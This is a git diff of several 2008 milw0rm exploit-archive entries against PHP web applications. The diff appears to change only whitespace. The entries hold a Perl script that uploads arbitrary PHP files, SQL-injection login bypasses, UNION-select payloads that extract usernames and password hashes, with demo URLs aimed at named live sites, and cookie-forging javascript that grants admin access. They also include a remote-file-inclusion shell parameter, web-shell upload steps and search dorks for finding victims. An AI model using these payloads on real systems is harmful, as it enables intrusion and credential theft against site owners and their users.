+++ b/platforms/php/webapps/6868.pl @@ -1,66 +1,66 @@ -#!/usr/bin/perl - -use warnings; -use strict; -use LWP::UserAgent; -use HTTP::Request::Common; - -my $fname = rand(99999) . ".php"; # no int() - -print <); - -print "\nEnter File Path(path to local file to upload): "; - chomp(my $file=); - -my $ua = LWP::UserAgent->new; -my $re = $ua->request(POST $url.'/components/com_simpleboard/image_upload.php', - Content_Type => 'form-data', - Content => [ attachimage => [ $file, $fname, Content_Type => 'image/jpeg' ], ] ); - -die "HTTP POST Failed!" unless $re->is_success; - -if($re->content =~ /open_basedir/) { - - print "open_basedir restriction enabled. Exploit failed. See php.ini for more details.\n"; # say() ? get perl510 -} -else { - - print "Looks like exploit was successfull! for uploaded file check: " . $url . "/components/com_simpleboard/" . $fname . "\n"; -} -exit; - -# milw0rm.com [2008-10-29] +#!/usr/bin/perl + +use warnings; +use strict; +use LWP::UserAgent; +use HTTP::Request::Common; + +my $fname = rand(99999) . ".php"; # no int() + +print <); + +print "\nEnter File Path(path to local file to upload): "; + chomp(my $file=); + +my $ua = LWP::UserAgent->new; +my $re = $ua->request(POST $url.'/components/com_simpleboard/image_upload.php', + Content_Type => 'form-data', + Content => [ attachimage => [ $file, $fname, Content_Type => 'image/jpeg' ], ] ); + +die "HTTP POST Failed!" unless $re->is_success; + +if($re->content =~ /open_basedir/) { + + print "open_basedir restriction enabled. Exploit failed. See php.ini for more details.\n"; # say() ? get perl510 +} +else { + + print "Looks like exploit was successfull! for uploaded file check: " . $url . "/components/com_simpleboard/" . $fname . "\n"; +} +exit; + +# milw0rm.com [2008-10-29] diff --git a/platforms/php/webapps/6869.txt b/platforms/php/webapps/6869.txt index c9c1196b7..80fe83666 100755 --- a/platforms/php/webapps/6869.txt +++ b/platforms/php/webapps/6869.txt 
@@ -1,73 +1,73 @@ --[*]+================================================================================+[*]- --[*]+ WebCards <= 1.3 Remote SQL Injection Vulnerability +[*]- --[*]+================================================================================+[*]- - - - -[*] Discovered By: t0pP8uZz -[*] Contact: irc.rizon.net #sectalk -[*] Discovered On: 22 October 2008 -[*] Script Download: http://www.mywebcards.net/ -[*] DORK: "Powered By Webcards" - - - -[*] Vendor Has Not Been Notified! - - - -[*] DESCRIPTION/USAGE: - - WebCards 1.3 and prior versions suffer from a MySQL injection in the admin login - page, This allows remote attackers to gain access to the administration area - without having a valid user/pass combination. - - All what is needed is the valid username, The default admin username is "admin" so - the below SQL syntax should gain entry to a vulnerable site. - - Not all sites are vulnerable, It relys on Magic Quotes, and other script settings for - this to work, I tested on about 15 sites, and 2 of those 15 were only vulnerable. - - Once in the administration area its possible to get a very easy shell, Which is - explained in the "Notes" section of this document. - - - -[*] SQL Injection: - - First find a vulnerable site, Then goto http://site.com/webcards/admin.php - - Enter the following in the username textbox: admin" and ""=" - Enter the following in the password textbox: 1 - - - -[*] NOTE/TIP: - - To gain a shell on the vulnerable host, Simply use the sql injection above, Once - administration is gained, Click "Add Image Macro" follow the onscreen instructions - and change the extension to php or what ever file type you want. - - Once complete goto "Images" and upload your shell/file, When its complete, Navigate - back to images, Goto "Show All" and look for your file name, then just copy the LINK. - - -[*] GREETZ: - - milw0rm.com, Offensive-Security.com, CipherCrew ! - - - -[-] Come hang in irc, irc.rizon.net #sectalk - - Peace... 
- - ...t0pP8uZz ! - - - --[*]+================================================================================+[*]- --[*]+ WebCards <= 1.3 Remote SQL Injection Vulnerability +[*]- --[*]+================================================================================+[*]- - -# milw0rm.com [2008-10-29] +-[*]+================================================================================+[*]- +-[*]+ WebCards <= 1.3 Remote SQL Injection Vulnerability +[*]- +-[*]+================================================================================+[*]- + + + +[*] Discovered By: t0pP8uZz +[*] Contact: irc.rizon.net #sectalk +[*] Discovered On: 22 October 2008 +[*] Script Download: http://www.mywebcards.net/ +[*] DORK: "Powered By Webcards" + + + +[*] Vendor Has Not Been Notified! + + + +[*] DESCRIPTION/USAGE: + + WebCards 1.3 and prior versions suffer from a MySQL injection in the admin login + page, This allows remote attackers to gain access to the administration area + without having a valid user/pass combination. + + All what is needed is the valid username, The default admin username is "admin" so + the below SQL syntax should gain entry to a vulnerable site. + + Not all sites are vulnerable, It relys on Magic Quotes, and other script settings for + this to work, I tested on about 15 sites, and 2 of those 15 were only vulnerable. + + Once in the administration area its possible to get a very easy shell, Which is + explained in the "Notes" section of this document. + + + +[*] SQL Injection: + + First find a vulnerable site, Then goto http://site.com/webcards/admin.php + + Enter the following in the username textbox: admin" and ""=" + Enter the following in the password textbox: 1 + + + +[*] NOTE/TIP: + + To gain a shell on the vulnerable host, Simply use the sql injection above, Once + administration is gained, Click "Add Image Macro" follow the onscreen instructions + and change the extension to php or what ever file type you want. 
+ + Once complete goto "Images" and upload your shell/file, When its complete, Navigate + back to images, Goto "Show All" and look for your file name, then just copy the LINK. + + +[*] GREETZ: + + milw0rm.com, Offensive-Security.com, CipherCrew ! + + + +[-] Come hang in irc, irc.rizon.net #sectalk + + Peace... + + ...t0pP8uZz ! + + + +-[*]+================================================================================+[*]- +-[*]+ WebCards <= 1.3 Remote SQL Injection Vulnerability +[*]- +-[*]+================================================================================+[*]- + +# milw0rm.com [2008-10-29] diff --git a/platforms/php/webapps/6874.txt b/platforms/php/webapps/6874.txt index 6768591f6..e88b4c28f 100755 --- a/platforms/php/webapps/6874.txt +++ b/platforms/php/webapps/6874.txt 
@@ -1,54 +1,54 @@ -################################################################ -# .___ __ _______ .___ # -# __| _/____ _______| | __ ____ \ _ \ __| _/____ # -# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # -# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # -# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # -# \/ \/ \/ # -# ___________ ______ _ __ # -# _/ ___\_ __ \_/ __ \ \/ \/ / # -# \ \___| | \/\ ___/\ / # -# \___ >__| \___ >\/\_/ # -# est.2007 \/ \/ forum.darkc0de.com # -################################################################ -# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - r45s4l # -# ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE # -# and all darkc0de members ---# -################################################################ -# -# Author: Beenu Arora -# -# Home : www.BeenuArora.com -# -# Email : beenudel1986@gmail.com -# -# Share the c0de! -# -################################################################ -# -# Title: harlandscripts Mypage.php Sql Injection - -# -# Vendor: http://www.harlandscripts.com/ ( Paid Script ) - -# -# -########################################################### -# -# d0rk:Powered by HarlandScripts.com -# -########################################################### - - - - Live Demo: - http://traffic.cyberaction.biz/mypage.php?trg=1142+and+1=2+union+select+1,2,3,user(),concat(0x3a,database()),6,7,8,9,10,11,12,13,14,15,version(),17,18,19,20,21,22,23,24,25,26,27,28-- - - - -########################################################### -# -# Bug discovered : 29 Oct.2008 -########################################################### - -# milw0rm.com [2008-10-29] +################################################################ +# .___ __ _______ .___ # +# __| _/____ _______| | __ ____ \ _ \ __| _/____ # +# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # +# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # +# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # +# \/ \/ \/ # +# ___________ ______ 
_ __ # +# _/ ___\_ __ \_/ __ \ \/ \/ / # +# \ \___| | \/\ ___/\ / # +# \___ >__| \___ >\/\_/ # +# est.2007 \/ \/ forum.darkc0de.com # +################################################################ +# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - r45s4l # +# ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE # +# and all darkc0de members ---# +################################################################ +# +# Author: Beenu Arora +# +# Home : www.BeenuArora.com +# +# Email : beenudel1986@gmail.com +# +# Share the c0de! +# +################################################################ +# +# Title: harlandscripts Mypage.php Sql Injection + +# +# Vendor: http://www.harlandscripts.com/ ( Paid Script ) + +# +# +########################################################### +# +# d0rk:Powered by HarlandScripts.com +# +########################################################### + + + + Live Demo: + http://traffic.cyberaction.biz/mypage.php?trg=1142+and+1=2+union+select+1,2,3,user(),concat(0x3a,database()),6,7,8,9,10,11,12,13,14,15,version(),17,18,19,20,21,22,23,24,25,26,27,28-- + + + +########################################################### +# +# Bug discovered : 29 Oct.2008 +########################################################### + +# milw0rm.com [2008-10-29] diff --git a/platforms/php/webapps/6876.txt b/platforms/php/webapps/6876.txt index 126b5e5d7..68642acf8 100755 --- a/platforms/php/webapps/6876.txt +++ b/platforms/php/webapps/6876.txt 
@@ -1,41 +1,41 @@ -Booking System for Hotels Group powered by Venalsur Bookingcenter XSS/SQL injetion vulnerability! ------------------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------------- -Author: d3b4g - -Greetz: str0ke,,Darkc0de.com,rez0rn,draconyx,godinlaw,hatebreeder And all my friends -Site : www.bl4ck3nd.info -Contact: bl4ckend[at]gmail[dot]com -------------------------------------------------------------------- - - -------------------------------------------------------------------- -Dork: N/A -------------------------------------------------------------------- -Affected software: - ------------------ -Application : Booking System for Hotels Group powered by Venalsur Bookingcenter -URL : http://www.bookingcentre.eu -=================================================================== - -Sql injection -============= - - -Exploit: http://site.com/www_en/cadena_ofertas_ext.php?OfertaID= [sql] - -Demo : http://demo.hotelsadmin.com/www_en/cadena_ofertas_ext.php?OfertaID=-1+union+all+select+1,2,3,concat(username,password),5,6,7,8,9,10,11+from+members/* - ------------------------------------------------------------------------- - -Xss -=== - -Exploit:http://demo.hotelsadmin.com/www_en/cadena_ofertas_ext.php?OfertaID= - -========================================================================= - -Proud to be a maldivian :):) Happy new maldives [29.10.2008] - -# milw0rm.com [2008-10-29] +Booking System for Hotels Group powered by Venalsur Bookingcenter XSS/SQL injetion vulnerability! 
+------------------------------------------------------------------------------------------------------ +------------------------------------------------------------------------------------------------------ +Author: d3b4g + +Greetz: str0ke,,Darkc0de.com,rez0rn,draconyx,godinlaw,hatebreeder And all my friends +Site : www.bl4ck3nd.info +Contact: bl4ckend[at]gmail[dot]com +------------------------------------------------------------------- + + +------------------------------------------------------------------- +Dork: N/A +------------------------------------------------------------------- +Affected software: + +----------------- +Application : Booking System for Hotels Group powered by Venalsur Bookingcenter +URL : http://www.bookingcentre.eu +=================================================================== + +Sql injection +============= + + +Exploit: http://site.com/www_en/cadena_ofertas_ext.php?OfertaID= [sql] + +Demo : http://demo.hotelsadmin.com/www_en/cadena_ofertas_ext.php?OfertaID=-1+union+all+select+1,2,3,concat(username,password),5,6,7,8,9,10,11+from+members/* + +------------------------------------------------------------------------ + +Xss +=== + +Exploit:http://demo.hotelsadmin.com/www_en/cadena_ofertas_ext.php?OfertaID= + +========================================================================= + +Proud to be a maldivian :):) Happy new maldives [29.10.2008] + +# milw0rm.com [2008-10-29] diff --git a/platforms/php/webapps/6877.txt b/platforms/php/webapps/6877.txt index 522de7716..26ffe7e54 100755 --- a/platforms/php/webapps/6877.txt +++ b/platforms/php/webapps/6877.txt 
@@ -1,47 +1,47 @@ -|___________________________________________________ -| Pro Traffic One( poll_results.php id) Remote SQL Injection Vulnerability -|___________________________________________________ -|-------------------- IQ-SecuritY ------------------- -| -| Author: Hussin X -| -| Home : WwW.IQ-ty.CoM -| -| email: darkangel_g85[at]Yahoo[DoT]com -| -|___________________________________________________ -| -| -| script : http://www.webmasterdownload.com/ -| -| DorK : :) -|___________________________________________________ - -Exploit: -________ - - -www.[target].com/Script/poll_results.php?id=-1+union+select+1,concat(version(),0x3e,user())-- - - -Demo -________ - -http://www.free4newbies.com/pro-traffic/poll_results.php?id=-1+union+select+1,concat(version(),0x3e,user())-- - - - - -____________________________( Greetz )_________________________________________ -| -| All members of the Forum IQ-SecuritY WwW.IQ-ty.CoM | AnD TrYaG WwW.TrYaG.CC -| -| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr -| -| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab | G4N0K -|___________________________________________________________________________ - - - Im IRAQi | Im TrYaGi - -# milw0rm.com [2008-10-29] +|___________________________________________________ +| Pro Traffic One( poll_results.php id) Remote SQL Injection Vulnerability +|___________________________________________________ +|-------------------- IQ-SecuritY ------------------- +| +| Author: Hussin X +| +| Home : WwW.IQ-ty.CoM +| +| email: darkangel_g85[at]Yahoo[DoT]com +| +|___________________________________________________ +| +| +| script : http://www.webmasterdownload.com/ +| +| DorK : :) +|___________________________________________________ + +Exploit: +________ + + +www.[target].com/Script/poll_results.php?id=-1+union+select+1,concat(version(),0x3e,user())-- + + +Demo +________ + 
+http://www.free4newbies.com/pro-traffic/poll_results.php?id=-1+union+select+1,concat(version(),0x3e,user())-- + + + + +____________________________( Greetz )_________________________________________ +| +| All members of the Forum IQ-SecuritY WwW.IQ-ty.CoM | AnD TrYaG WwW.TrYaG.CC +| +| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr +| +| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab | G4N0K +|___________________________________________________________________________ + + + Im IRAQi | Im TrYaGi + +# milw0rm.com [2008-10-29] diff --git a/platforms/php/webapps/6879.txt b/platforms/php/webapps/6879.txt index fdfd3784c..288b0c25f 100755 --- a/platforms/php/webapps/6879.txt +++ b/platforms/php/webapps/6879.txt 
@@ -1,29 +1,29 @@ -/* - ----------------------------------------------------------------------------------- - MyPHP Forum (Final) <= 3.0 (Edit Topics/Blind SQL Injection) Remote Vulnerabilities - ----------------------------------------------------------------------------------- - Discovered By StAkeR[at]hotmail[dot]it - Download On http://www.myphp.ws/ - - - - member.php (confirm - Blind SQL Injection) - - member.php?action=confirm&id=' or ascii(substring((select password from nb_member where uid=1),1,1))=98/* - - - member.php (newconfirm - Blind SQL Injection) - - member.php?action=newconfirm&user=' or ascii(substring((select password from nb_member where uid=1),1,1))=98-- - - - member.php?action=reqpwd (reqpwd - Blind SQL Injection) - - insert ' or ascii(substring((select password from nb_member where uid=1),1,1))=98# - - - post.php (post Blind SQL Injection) - - post.php?action=post&fid=1&tid=1"e=' or ascii(substring((select password from nb_member where uid=1),1,1))=9%23 - - - post.php (edit - Edit Topics) - - post.php?action=edit&fid=1&tid=1&pid=[id topic] ' or '1=1 - - - - -/* - -# milw0rm.com [2008-10-30] +/* + ----------------------------------------------------------------------------------- + MyPHP Forum (Final) <= 3.0 (Edit Topics/Blind SQL Injection) Remote Vulnerabilities + ----------------------------------------------------------------------------------- + Discovered By StAkeR[at]hotmail[dot]it + Download On http://www.myphp.ws/ + + + - member.php (confirm - Blind SQL Injection) + - member.php?action=confirm&id=' or ascii(substring((select password from nb_member where uid=1),1,1))=98/* + + - member.php (newconfirm - Blind SQL Injection) + - member.php?action=newconfirm&user=' or ascii(substring((select password from nb_member where uid=1),1,1))=98-- + + - member.php?action=reqpwd (reqpwd - Blind SQL Injection) + - insert ' or ascii(substring((select password from nb_member where uid=1),1,1))=98# + + - post.php (post Blind SQL Injection) + - 
post.php?action=post&fid=1&tid=1"e=' or ascii(substring((select password from nb_member where uid=1),1,1))=9%23 + + - post.php (edit - Edit Topics) + - post.php?action=edit&fid=1&tid=1&pid=[id topic] ' or '1=1 + + + + +/* + +# milw0rm.com [2008-10-30] diff --git a/platforms/php/webapps/6881.txt b/platforms/php/webapps/6881.txt index 2f3c24cdb..b612d6dac 100755 --- a/platforms/php/webapps/6881.txt +++ b/platforms/php/webapps/6881.txt 
@@ -1,35 +1,35 @@ -############################################################################################### - _____ ____ __ ___ ______ ______ | ____ _____ _____ -| / ___| \ \ / / / ____| / | | | | _ \ | -|_____ | | _ \ V / | | | | ___| |_____ | |_) | |_____ -| | |_ || | | | |____ | | | | | | _ | | -|_____ \____| |_| \_____| \_____/ |___| |____ |__| \_\ ______| - -# Author : Hakxer -# Home : Www.educ-up.com -# Type Gap : Insecure cookie handling -# script : Absloute File Send [see script] http://www.xigla.com/afilesend/demo.htm -# Greetz : Allah , Egyptian x Hacker , all my team , All educ-up member -# Team : EgY Coders -################################################################################################# - -# Dork : "Powered by Absolute File Send" - -# First go to Admin panel : http://www.xigla.com/afilesend/demo/login.aspx -# Exploit : -# [~] javascript:document.cookie="xlaAFSuser=p=admin"; -# Second Go to http://www.xigla.com/afilesend/demo/menu.aspx -# See Admin panel .. - -# Have Fun :D - - -############################################################################### - --------------------------------- The End of Gap ----------------------------------- - -## Contact : aq5@windowslive.com -### Muslim Hacker .. 
I love you Mohammed Rasull Allah -###################################################### - -# milw0rm.com [2008-10-30] +############################################################################################### + _____ ____ __ ___ ______ ______ | ____ _____ _____ +| / ___| \ \ / / / ____| / | | | | _ \ | +|_____ | | _ \ V / | | | | ___| |_____ | |_) | |_____ +| | |_ || | | | |____ | | | | | | _ | | +|_____ \____| |_| \_____| \_____/ |___| |____ |__| \_\ ______| + +# Author : Hakxer +# Home : Www.educ-up.com +# Type Gap : Insecure cookie handling +# script : Absloute File Send [see script] http://www.xigla.com/afilesend/demo.htm +# Greetz : Allah , Egyptian x Hacker , all my team , All educ-up member +# Team : EgY Coders +################################################################################################# + +# Dork : "Powered by Absolute File Send" + +# First go to Admin panel : http://www.xigla.com/afilesend/demo/login.aspx +# Exploit : +# [~] javascript:document.cookie="xlaAFSuser=p=admin"; +# Second Go to http://www.xigla.com/afilesend/demo/menu.aspx +# See Admin panel .. + +# Have Fun :D + + +############################################################################### + +-------------------------------- The End of Gap ----------------------------------- + +## Contact : aq5@windowslive.com +### Muslim Hacker .. I love you Mohammed Rasull Allah +###################################################### + +# milw0rm.com [2008-10-30] diff --git a/platforms/php/webapps/6882.txt b/platforms/php/webapps/6882.txt index 91d247f54..e22ae586b 100755 --- a/platforms/php/webapps/6882.txt +++ b/platforms/php/webapps/6882.txt 
@@ -1,38 +1,38 @@ -############################################################################################### - _____ ____ __ ___ ______ ______ | ____ _____ _____ -| / ___| \ \ / / / ____| / | | | | _ \ | -|_____ | | _ \ V / | | | | ___| |_____ | |_) | |_____ -| | |_ || | | | |____ | | | | | | _ | | -|_____ \____| |_| \_____| \_____/ |___| |____ |__| \_\ ______| - -# Discovered By : Hakxer -# Home : Www.educ-up.com -# Type Gap : Insecure cookie handling -# script : Absloute Podcast V 1.0 [see script] http://www.xigla.com/apodcasting/demo.htm -# Greetz : Allah , Egyptian x Hacker , all my team , All educ-up member -# Team : EgY Coders -################################################################################################# - -# Dork : "Powered by Absolute Podcast " - -# Poc -==> javascript:document.cookie="xlaAPCuser=userid=1&lvl=1&s="; - -# Live Script - -# First go to Admin panel : http://www.xigla.com/apodcasting/demo/login.aspx -# [~] javascript:document.cookie="xlaAPCuser=userid=1&lvl=1&s="; -# Second Go to http://www.xigla.com/apodcasting/demo/menu.aspx -# See Admin panel .. - -# Have Fun :D - -############################################################################### - --------------------------------- The End of Gap ----------------------------------- - -## Contact : aq5@windowslive.com -### Muslim Hacker .. 
I love you Mohammed Rasull Allah -###################################################### - -# milw0rm.com [2008-10-30] +############################################################################################### + _____ ____ __ ___ ______ ______ | ____ _____ _____ +| / ___| \ \ / / / ____| / | | | | _ \ | +|_____ | | _ \ V / | | | | ___| |_____ | |_) | |_____ +| | |_ || | | | |____ | | | | | | _ | | +|_____ \____| |_| \_____| \_____/ |___| |____ |__| \_\ ______| + +# Discovered By : Hakxer +# Home : Www.educ-up.com +# Type Gap : Insecure cookie handling +# script : Absloute Podcast V 1.0 [see script] http://www.xigla.com/apodcasting/demo.htm +# Greetz : Allah , Egyptian x Hacker , all my team , All educ-up member +# Team : EgY Coders +################################################################################################# + +# Dork : "Powered by Absolute Podcast " + +# Poc +==> javascript:document.cookie="xlaAPCuser=userid=1&lvl=1&s="; + +# Live Script + +# First go to Admin panel : http://www.xigla.com/apodcasting/demo/login.aspx +# [~] javascript:document.cookie="xlaAPCuser=userid=1&lvl=1&s="; +# Second Go to http://www.xigla.com/apodcasting/demo/menu.aspx +# See Admin panel .. + +# Have Fun :D + +############################################################################### + +-------------------------------- The End of Gap ----------------------------------- + +## Contact : aq5@windowslive.com +### Muslim Hacker .. I love you Mohammed Rasull Allah +###################################################### + +# milw0rm.com [2008-10-30] diff --git a/platforms/php/webapps/6883.txt b/platforms/php/webapps/6883.txt index e0967ea06..738d5924f 100755 --- a/platforms/php/webapps/6883.txt +++ b/platforms/php/webapps/6883.txt 
@@ -1,38 +1,38 @@ -############################################################################################### - _____ ____ __ ___ ______ ______ | ____ _____ _____ -| / ___| \ \ / / / ____| / | | | | _ \ | -|_____ | | _ \ V / | | | | ___| |_____ | |_) | |_____ -| | |_ || | | | |____ | | | | | | _ | | -|_____ \____| |_| \_____| \_____/ |___| |____ |__| \_\ ______| - -# Discovered By : Hakxer -# Home : Www.educ-up.com -# Type Gap : Insecure cookie handling -# script : Absolute Poll Manager XE v 4.1 [see script] http://www.xigla.com/absolutepm/demo.htm -# Greetz : Allah , Egyptian x Hacker , all my team , All educ-up member -# Team : EgY Coders -################################################################################################# - -# Dork : " Absolute Poll Manager XE " - -# Poc -==> javascript:document.cookie="xlaAPM%5Fusr=administrator"; - -# Demo Script < Test> - -# First go to Admin panel : http://www.xigla.com/absolutepm/xlaabsolutepm/login.asp -# [~] Exploit this : javascript:document.cookie="xlaAPM%5Fusr=administrator"; -# And Go to http://www.xigla.com/absolutepm/xlaabsolutepm/menu.asp -# See Admin panel .. - -# Have Fun :D - -############################################################################### - --------------------------------- The End of Gap ----------------------------------- - -## Contact : aq5@windowslive.com -### Muslim Hacker .. 
I love you Mohammed Rasull Allah -###################################################### - -# milw0rm.com [2008-10-30] +############################################################################################### + _____ ____ __ ___ ______ ______ | ____ _____ _____ +| / ___| \ \ / / / ____| / | | | | _ \ | +|_____ | | _ \ V / | | | | ___| |_____ | |_) | |_____ +| | |_ || | | | |____ | | | | | | _ | | +|_____ \____| |_| \_____| \_____/ |___| |____ |__| \_\ ______| + +# Discovered By : Hakxer +# Home : Www.educ-up.com +# Type Gap : Insecure cookie handling +# script : Absolute Poll Manager XE v 4.1 [see script] http://www.xigla.com/absolutepm/demo.htm +# Greetz : Allah , Egyptian x Hacker , all my team , All educ-up member +# Team : EgY Coders +################################################################################################# + +# Dork : " Absolute Poll Manager XE " + +# Poc +==> javascript:document.cookie="xlaAPM%5Fusr=administrator"; + +# Demo Script < Test> + +# First go to Admin panel : http://www.xigla.com/absolutepm/xlaabsolutepm/login.asp +# [~] Exploit this : javascript:document.cookie="xlaAPM%5Fusr=administrator"; +# And Go to http://www.xigla.com/absolutepm/xlaabsolutepm/menu.asp +# See Admin panel .. + +# Have Fun :D + +############################################################################### + +-------------------------------- The End of Gap ----------------------------------- + +## Contact : aq5@windowslive.com +### Muslim Hacker .. I love you Mohammed Rasull Allah +###################################################### + +# milw0rm.com [2008-10-30] diff --git a/platforms/php/webapps/6885.txt b/platforms/php/webapps/6885.txt index aadf168fe..239b5d7dd 100755 --- a/platforms/php/webapps/6885.txt +++ b/platforms/php/webapps/6885.txt 
@@ -1,39 +1,39 @@ -e107 Plugin lyrics_menu lyrics_song.php (l_id) Remote Sql inj - -author: ZoRLu - -home: z0rlu.blogspot.com - -concat: trt-turk@hotmail.com - -date: 30/10/2008 ( saat 23:36 the_k@m!l'lerdeyim a.q :) ) - -n0te: YALNIZLIK YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( - -n0te: a.q kpss : ) ) - -dork: allinurl:"lyrics_menu/lyrics_song.php?l_id=" - -exploit: - -http://localhost/script_path/lyrics_song.php?l_id=[SQL1] or [SQL2] - -[SQL1] = column number 15 - --1+union+select+1,concat(user_name,0x3a,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+e107_user-- - -example 1: - -http://www.mirage.org/e107_plugins/lyrics_menu/lyrics_song.php?l_id=-1+union+select+1,concat(user_name,0x3a,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15++from+e107_user-- - -[SQL2] = column number 17 - --1+union+select+1,2,3,concat(user(),0x3a,database()),5,6,7,8,9,10,11,12,13,14,15,16,17-- - -example 2: - -http://www.reklamadatbazis.hu/e107_plugins/lyrics_menu/lyrics_song.php?l_id=-1+union+select+1,2,3,concat(user(),0x3a,database()),5,6,7,8,9,10,11,12,13,14,15,16,17-- - -thanks: str0ke - -# milw0rm.com [2008-10-31] +e107 Plugin lyrics_menu lyrics_song.php (l_id) Remote Sql inj + +author: ZoRLu + +home: z0rlu.blogspot.com + +concat: trt-turk@hotmail.com + +date: 30/10/2008 ( saat 23:36 the_k@m!l'lerdeyim a.q :) ) + +n0te: YALNIZLIK YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( + +n0te: a.q kpss : ) ) + +dork: allinurl:"lyrics_menu/lyrics_song.php?l_id=" + +exploit: + +http://localhost/script_path/lyrics_song.php?l_id=[SQL1] or [SQL2] + +[SQL1] = column number 15 + +-1+union+select+1,concat(user_name,0x3a,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+e107_user-- + +example 1: + +http://www.mirage.org/e107_plugins/lyrics_menu/lyrics_song.php?l_id=-1+union+select+1,concat(user_name,0x3a,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15++from+e107_user-- + +[SQL2] = column number 17 + +-1+union+select+1,2,3,concat(user(),0x3a,database()),5,6,7,8,9,10,11,12,13,14,15,16,17-- + +example 2: + 
+http://www.reklamadatbazis.hu/e107_plugins/lyrics_menu/lyrics_song.php?l_id=-1+union+select+1,2,3,concat(user(),0x3a,database()),5,6,7,8,9,10,11,12,13,14,15,16,17-- + +thanks: str0ke + +# milw0rm.com [2008-10-31] diff --git a/platforms/php/webapps/6886.txt b/platforms/php/webapps/6886.txt index 9d918374e..6a298b5ee 100755 --- a/platforms/php/webapps/6886.txt +++ b/platforms/php/webapps/6886.txt 
@@ -1,42 +1,42 @@ -biqcms 5.0.9a (beta) Insecure Cookie Handling Vulnerability -[~] -[~] donwload: http://sourceforge.net/project/showfiles.php?group_id=143555&package_id=232638&release_id=636935 -[~] -[~] ---------------------------------------------------------- -[~] Discovered By: ZoRLu -[~] -[~] Date: 30.10.2008 -[~] -[~] Home: www.z0rlu.blogspot.com -[~] -[~] contact: trt-turk@hotmail.com -[~] -[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( -[~] -[~] N0T: a.q kpss : ) ) -[~] -[~] ----------------------------------------------------------- - -code: - - setcookie ("COOKIE_LAST_ADMIN_USER", $newAdmin["username"], time()+8640000, '/'); - setcookie ("COOKIE_LAST_ADMIN_LANG", $newAdmin["use_language_id"], time()+8640000, '/'); - - -Exploit: - -javascript:document.cookie = "COOKIE_LAST_ADMIN_USER=real_admin_name; path=/"; document.cookie = "COOKIE_LAST_ADMIN_LANG=en-GB; path=/"; - -example for my localhost: - -javascript:document.cookie = "COOKIE_LAST_ADMIN_USER=zorlu; path=/"; document.cookie = "COOKIE_LAST_ADMIN_LANG=en-GB; path=/"; - -[~]---------------------------------------------------------------------- -[~] Greetz tO: str0ke & all Muslim HaCkeRs -[~] -[~] yildirimordulari.org & r00tsecurity.org & darkc0de.com -[~] -[~]---------------------------------------------------------------------- - - -# milw0rm.com [2008-10-31] +biqcms 5.0.9a (beta) Insecure Cookie Handling Vulnerability +[~] +[~] donwload: http://sourceforge.net/project/showfiles.php?group_id=143555&package_id=232638&release_id=636935 +[~] +[~] ---------------------------------------------------------- +[~] Discovered By: ZoRLu +[~] +[~] Date: 30.10.2008 +[~] +[~] Home: www.z0rlu.blogspot.com +[~] +[~] contact: trt-turk@hotmail.com +[~] +[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( +[~] +[~] N0T: a.q kpss : ) ) +[~] +[~] ----------------------------------------------------------- + +code: + + setcookie ("COOKIE_LAST_ADMIN_USER", $newAdmin["username"], time()+8640000, '/'); + 
setcookie ("COOKIE_LAST_ADMIN_LANG", $newAdmin["use_language_id"], time()+8640000, '/'); + + +Exploit: + +javascript:document.cookie = "COOKIE_LAST_ADMIN_USER=real_admin_name; path=/"; document.cookie = "COOKIE_LAST_ADMIN_LANG=en-GB; path=/"; + +example for my localhost: + +javascript:document.cookie = "COOKIE_LAST_ADMIN_USER=zorlu; path=/"; document.cookie = "COOKIE_LAST_ADMIN_LANG=en-GB; path=/"; + +[~]---------------------------------------------------------------------- +[~] Greetz tO: str0ke & all Muslim HaCkeRs +[~] +[~] yildirimordulari.org & r00tsecurity.org & darkc0de.com +[~] +[~]---------------------------------------------------------------------- + + +# milw0rm.com [2008-10-31] diff --git a/platforms/php/webapps/6887.txt b/platforms/php/webapps/6887.txt index 51d16f2ce..5edfbb110 100755 --- a/platforms/php/webapps/6887.txt +++ b/platforms/php/webapps/6887.txt @@ -1,12 +1,12 @@ -Script Name : Cybershare CMS - -Download : http://sourceforge.net/project/downloading.php?group_id=213056&use_mirror=surfnet&filename=cybershade_0.2b-DEV.zip&40561526 - -Error : -include $CMS_ROOT."core/core.php"; - -Vul. Code : htp://[site]/[path]/core/includes.php?CMS_ROOT=[Shell] - -Thanks : Kezzap66345 - Septemb0x - -# milw0rm.com [2008-10-31] +Script Name : Cybershare CMS + +Download : http://sourceforge.net/project/downloading.php?group_id=213056&use_mirror=surfnet&filename=cybershade_0.2b-DEV.zip&40561526 + +Error : +include $CMS_ROOT."core/core.php"; + +Vul. Code : htp://[site]/[path]/core/includes.php?CMS_ROOT=[Shell] + +Thanks : Kezzap66345 - Septemb0x + +# milw0rm.com [2008-10-31] diff --git a/platforms/php/webapps/6888.txt b/platforms/php/webapps/6888.txt index 060a56bb4..2e0bcecc0 100755 --- a/platforms/php/webapps/6888.txt +++ b/platforms/php/webapps/6888.txt 
